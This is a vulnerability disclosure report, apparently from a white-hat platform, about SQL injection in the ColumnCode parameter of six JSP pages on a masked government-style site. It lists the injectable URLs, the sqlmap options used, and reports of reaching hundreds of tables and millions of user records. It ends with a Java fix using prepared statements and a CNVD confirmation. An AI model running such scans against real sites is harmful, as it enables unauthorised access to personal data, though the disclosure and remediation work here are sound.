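2016-04-04: Details reported to the vendor; awaiting vendor handling
2016-04-06: Vendor confirmed; details disclosed only to the vendor
2016-04-16: Details disclosed to core white hats and experts in related fields
2016-04-26: Details disclosed to regular white hats
2016-05-06: Details disclosed to intern white hats
2016-05-21: Details disclosed to the public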
Data!~~~
Injection points:
http://**.**.**.**/Website/newslist.jsp?ColumnCode=m0403
http://**.**.**.**/website/newsshowphoto.jsp?ColumnCode=l07
http://**.**.**.**/Website/contentshow.jsp?ColumnCode=m0301
http://**.**.**.**/Website/newslistm8001.jsp?ColumnCode=m8001
http://**.**.**.**/Website/newslistm0204.jsp?ColumnCode=m0204
http://**.**.**.**/Website/filelist.jsp?ColumnCode=02
ColumnCode is injectable in every one of them. Tested with the trusty sqlmap, adding the parameters --threads 10 --dbms "Oracle" --level 3 --risk 3
Let's take the current database and look at the data in it!~~~ 429 tables in total.
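Tens of millions of records; it was just too slow, so I did not continue!~~~
A large number of users; tens of millions of records are involved!~~~
Fix by filtering the input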
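A sketch of the fix for a ColumnCode lookup, as an added example that is not code from the report or from the affected site: the value is checked against an allow-list pattern and then passed as a bind variable, so it never becomes part of the SQL text. The class name, the `news` table with its columns, and the exact pattern are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

/** Added example: hardened lookup for a JSP page that takes ColumnCode. */
public final class ColumnCodeQuery {
    // The codes in the report's URLs (m0403, l07, 02) are short alphanumerics.
    // The exact rule is an assumption; tighten it to the site's real code list.
    private static final Pattern COLUMN_CODE = Pattern.compile("[A-Za-z0-9]{1,8}");

    // Hypothetical table and column names, not taken from the report.
    private static final String SQL =
        "SELECT title FROM news WHERE column_code = ? ORDER BY publish_time DESC";

    /** matches() tests the whole string, so quotes, spaces and operators fail. */
    static boolean isValidColumnCode(String value) {
        return value != null && COLUMN_CODE.matcher(value).matches();
    }

    /** Validation is defence in depth; the bind variable is the actual fix. */
    static List<String> listTitles(Connection conn, String columnCode) throws SQLException {
        if (!isValidColumnCode(columnCode)) {
            throw new IllegalArgumentException("invalid ColumnCode");
        }
        try (PreparedStatement ps = conn.prepareStatement(SQL)) {
            ps.setString(1, columnCode); // sent as data, never parsed as SQL
            try (ResultSet rs = ps.executeQuery()) {
                List<String> titles = new ArrayList<>();
                while (rs.next()) {
                    titles.add(rs.getString(1));
                }
                return titles;
            }
        }
    }

    public static void main(String[] args) {
        // Constructed inputs: three codes from the report's URLs, then malformed values.
        String[] samples = {"m0403", "l07", "02", "m0403'", "m0403 or 1=1", ""};
        for (String s : samples) {
            System.out.println("[" + s + "] valid=" + isValidColumnCode(s));
        }
    }
}
```

The same change applies to each of the six JSP pages listed above, since they all read ColumnCode.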
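Severity: High
Vulnerability Rank: 10
Confirmed at: 2016-04-06 14:14
CNVD confirmed and reproduced the situation described. It has been forwarded through CNCERT to the Shaanxi branch center, which will coordinate follow-up handling with the organization that manages the website.
None yet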